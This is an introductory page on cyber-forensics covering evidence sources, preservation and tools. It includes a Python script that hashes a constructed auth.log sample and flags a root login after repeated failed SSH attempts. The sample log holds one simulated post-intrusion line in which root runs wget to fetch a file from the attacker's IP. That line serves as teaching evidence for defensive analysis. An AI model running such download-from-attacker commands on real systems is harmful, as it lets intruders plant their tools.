Forensics

Cyber-forensics is the collection and analysis of the digital traces left by attacks and other malicious events. Its goals are to reconstruct what happened, identify the perpetrator where possible, and produce a report that supports remediation and prevents a repeat. Because the findings may end up in front of management, insurers or a court, evidence has to be acquired and preserved in a way that can be defended: document every step, hash what you collect, and avoid altering the original.

A complete investigation covers every potential source of evidence:

  • Memory
  • Applications / processes
  • Logging information (from services, authentication, system updates, installs)
  • Filesystem
  • Network traffic (at different levels: raw packets, protocol metadata, application-layer data)
  • Disk information (hidden data in hidden files, partition layout, unallocated space)
  • Mobile devices
  • Cloud / remote systems
  • Databases

The most volatile sources (memory, running processes, open network connections, logged-in sessions) are lost on reboot or shutdown, so capture them before touching disks or pulling the plug.

Forensic investigators combine experience, a large palette of tools and established best practices to extract evidence from a system or infrastructure that has been attacked.

Tools range from basic system and network utilities (find, ps, tcpdump, Wireshark) to full-fledged solutions that automate much of the work (Volatility for memory analysis, The Sleuth Kit for disk and filesystem analysis, CAINE as a bootable forensics distribution). Whatever the tool, work on a verified copy whenever possible: hash the image or log file when it is acquired and again before analysis, so the report can show the evidence was not modified in between.
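As an added example for the "logging information" area above (this is illustration code, not part of the original page or any of the tools it names), the script below hashes a log as acquired, parses sshd entries from an auth.log-style text into a time-ordered timeline, and flags a successful login that follows a burst of failed attempts from the same source IP. The sample log lines, the hostnames and IPs (RFC 5737 documentation ranges), the year used for the syslog timestamps, and the failure threshold and time window are all constructed or assumed for the example.

```python
"""Auth-log triage on a constructed sample (added example, not from the original page)."""
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: documentation IPs and made-up hostnames, not real evidence.
SAMPLE_AUTH_LOG = """\
Mar  4 02:11:07 web01 sshd[4121]: Failed password for root from 198.51.100.23 port 51822 ssh2
Mar  4 02:11:09 web01 sshd[4121]: Failed password for root from 198.51.100.23 port 51822 ssh2
Mar  4 02:11:12 web01 sshd[4125]: Failed password for invalid user admin from 198.51.100.23 port 51830 ssh2
Mar  4 02:11:15 web01 sshd[4127]: Failed password for root from 198.51.100.23 port 51834 ssh2
Mar  4 02:11:20 web01 sshd[4130]: Failed password for root from 198.51.100.23 port 51840 ssh2
Mar  4 02:11:41 web01 sshd[4133]: Accepted password for root from 198.51.100.23 port 51850 ssh2
Mar  4 02:12:02 web01 sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/wget http://198.51.100.23/x
Mar  4 03:05:44 web01 sshd[4210]: Accepted publickey for deploy from 203.0.113.8 port 40012 ssh2
Mar  4 03:06:10 web01 sshd[4212]: Failed password for deploy from 203.0.113.8 port 40020 ssh2
"""

# sshd login-outcome lines only; other daemons (sudo, cron, ...) are skipped by this parser.
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+)"
)


def evidence_sha256(text):
    """Hash the log exactly as acquired, so the report can show it was not altered later."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def parse_sshd_events(log_text, year=2024):
    """Turn sshd Accepted/Failed lines into event dicts sorted oldest-first.

    syslog timestamps carry no year, so `year` is an assumed parameter here; on a
    real case take it from the rotation date or the file's own metadata.
    """
    events = []
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
        events.append({
            "ts": ts, "host": m["host"], "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"], "port": int(m["port"]), "raw": line,
        })
    events.sort(key=lambda e: e["ts"])  # syslog is normally in order, but do not assume it
    return events


def find_brute_force_logins(events, threshold=3, window=timedelta(minutes=5)):
    """Report each Accepted login preceded by at least `threshold` Failed attempts
    from the same IP inside `window` (both values are assumed for the example)."""
    findings = []
    failures = defaultdict(list)  # ip -> timestamps of failed attempts since the last success
    for e in events:
        ip = e["ip"]
        if e["result"] == "Failed":
            failures[ip].append(e["ts"])
            continue
        recent = [t for t in failures[ip] if e["ts"] - t <= window]
        if len(recent) >= threshold:
            findings.append({
                "ip": ip, "user": e["user"], "method": e["method"],
                "failures": len(recent), "first_failure": recent[0], "login": e["ts"],
            })
        failures[ip] = []  # a success ends the burst; later probes are counted afresh
    return findings


if __name__ == "__main__":
    print("evidence sha256:", evidence_sha256(SAMPLE_AUTH_LOG))
    evs = parse_sshd_events(SAMPLE_AUTH_LOG)
    for e in evs:
        print(e["ts"].isoformat(), e["ip"], e["result"], e["method"], e["user"])
    for f in find_brute_force_logins(evs):
        print(f"ALERT {f['ip']} -> {f['user']}: {f['failures']} failures since "
              f"{f['first_failure'].time()}, then login at {f['login'].time()} via {f['method']}")
```

On the sample the only finding is 198.51.100.23, which logs in as root after five failures inside a minute; the deploy user's single failure after a key-based login is ignored. The sudo line is deliberately left out of this narrow timeline, which is exactly the kind of gap a real investigation closes by merging several log sources (sudo, cron, the shell history on disk) into one ordered view.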